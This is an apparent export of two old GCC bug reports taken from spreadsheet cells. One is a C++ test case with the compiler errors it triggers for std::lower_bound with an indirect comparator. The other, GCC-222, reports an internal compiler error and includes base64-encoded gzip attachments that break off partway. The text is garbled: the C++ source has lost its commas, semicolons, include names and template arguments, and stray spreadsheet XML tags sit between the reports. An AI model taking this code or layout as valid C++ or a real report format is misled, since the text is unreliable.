System: Linux kiste 2.4.1 #33 Thu Feb 15 12:51:39 CET 2001 i686 unknown
Architecture: i686
SuSE 7.1
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix
How-To-Repeat:
source file ts.C
#include
#include
#include
using namespace std
struct indirectCompare
{
    indirectCompare(const vector&amp; v) : V(v) {}
    bool operator()( int x  int y) const
    {
         return V[x] &lt; V[y]
    }
    bool operator()( int x const string&amp; a) const
    {
         return V[x] &lt; a
    }
    const vector
}
int main( )
{
    const int Maxi = 1022  
    vector Words(Maxi)
    vector Index(Maxi)
    for(size_t i = 0 i &lt; Index.size() i++)
       Index[i] = i
    indirectCompare aComparison(Words)  
    sort(Index.begin() Index.end() aComparison)
    string SearchTerm
    lower_bound(Index.begin() Index.end() SearchTerm aComparison) 
}
Compilation of ts.C by g++-v3
g++ -o ts ts.C -W -Wall -save-temps
/usr/local/include/g++-v3/bits/concept_checks.h: In static member function 
   `static void _STL_SAME_TYPE_ERROR&lt;_TypeX 
   _TypeY&gt;::__type_X_not_same_as_type_Y(_TypeX _TypeY) [with _TypeX = string 
   _TypeY = int]':
/usr/local/include/g++-v3/bits/stl_algo.h:1978:   instantiated from `_ForwardIter std::lower_bound(_ForwardIter _ForwardIter const _Tp&amp; _Compare) [with _ForwardIter = std::__normal_iterator &gt; &gt; _Tp = string _Compare = indirectCompare]'
ts.C:41:   instantiated from here
/usr/local/include/g++-v3/bits/concept_checks.h:262: conversion from 
   `__check_equal' to non-scalar type `__check_equal' requested
/usr/local/include/g++-v3/bits/concept_checks.h: In static member function 
   `static _Ret _STL_BINARY_FUNCTION_ERROR&lt;_Func _Ret _First 
   _Second&gt;::__binary_function_requirement_violation(_Func&amp; const _First&amp; 
   const _Second&amp;) [with _Func = indirectCompare _Ret = bool _First = string 
   _Second = string]':
/usr/local/include/g++-v3/bits/stl_algo.h:1980:   instantiated from `_ForwardIter std::lower_bound(_ForwardIter _ForwardIter const _Tp&amp; _Compare) [with _ForwardIter = std::__normal_iterator &gt; &gt; _Tp = string _Compare = indirectCompare]'
ts.C:41:   instantiated from here
/usr/local/include/g++-v3/bits/concept_checks.h:308: no match for call to 
   `(indirectCompare) (const std::basic_string 
   std::allocator &gt;&amp; const std::basic_string&lt;char 
   std::char_traits std::allocator &gt;&amp;)'
ts.C:12: candidates are: bool indirectCompare::operator()(int int) const
ts.C:17:                 bool indirectCompare::operator()(int const string&amp;) 
   const
Compilation by g++-2.95.2
/usr/bin/g++ -v -o ts ts.C -W -Wall 
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -W -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di486 -D__i486 -D__i486__ ts.C /tmp/ccVGbrjQ.ii
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/include/g++
 /usr/local/include
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/../../../../i486-suse-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/cc1plus /tmp/ccVGbrjQ.ii -quiet -dumpbase ts.cc -W -Wall -version -o /tmp/cc0jJfHD.s
GNU C++ version 2.95.2 19991024 (release) (i486-suse-linux) compiled by GNU C version 2.95.2 19991024 (release).
 /usr/i486-suse-linux/bin/as -V -Qy -o /tmp/cct0h7a4.o /tmp/cc0jJfHD.s
GNU assembler version 2.10.91 (i486-suse-linux) using BFD version 2.10.0.33
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o ts /usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i486-suse-linux/2.95.2/crtbegin.o -L/usr/lib/gcc-lib/i486-suse-linux/2.95.2 -L/usr/i486-suse-linux/lib /tmp/cct0h7a4.o -lstdc++ -lm -lgcc -lc -lgcc /usr/lib/gcc-lib/i486-suse-linux/2.95.2/crtend.o /usr/lib/crtn.o
preprocessed source file (g++-3)
See attachments for ts.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-222</t>
  </si>
  <si>
    <t>Internal compiler errror in gcc 2.96/20000501 [test case attached]</t>
  </si>
  <si>
    <t xml:space="preserve"> --iwHBbRI9kgIhsi5Q
 Content-Type: text/plain charset=us-ascii
 [Resend: I've _twice_ sent this to gcc-bugs and to gcc-gnats but not received
 the automated response and not been allocated a bug tracking number.]
 gcc version:
 	GNU C++ version 2.96 20000501 (experimental) (i686-pc-linux-gnu)
 	compiled by GNU C version 2.96 20000501 (experimental).
 	[previous versions of 2.96 also demonstrate this behaviour]
 o/s versions:
 	Linux 2.2.5-15 i686 [Redhat 6.1]
 	SunOS 5.5.1 sun4u sparc SUNWUltra-Enterprise
 compiler options:
 	none specified.
 command line:
 	gcc -v --save-temps bug.cc &gt; &amp; ! gcc-out
 bug.cc bug.ii gcc output:
 	see attached.
 --iwHBbRI9kgIhsi5Q
 Content-Type: application/x-gunzip
 Content-Disposition: attachment filename=bug.cc.gz
 Content-Transfer-Encoding: base64
 H4sICMcOETkAA2J1Zy5jYwBVjj0KwzAMRnedQlAIyZTdTbL0CtmL6hhq8B+ynFBK714n7dBq
 Eu9Jn3SyQbuyGBy88ZEfE4B2lDPO8IRUbs5qBVir7/ESQxYuWiIfaG6zLEpRkXhNwoO+E09I
 OOIfb4PZcHdddwZIbFcSo74Jes/EuanqAA3GZJjqifHXvT4a1mgX8GRDu3dd/fHYQqkj8AaV
 g1ntzAAAAA==
 --iwHBbRI9kgIhsi5Q
 Content-Type: application/x-gunzip
 Content-Disposition: attachment filename=bug.ii.gz
 Content-Transfer-Encoding: base64
 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
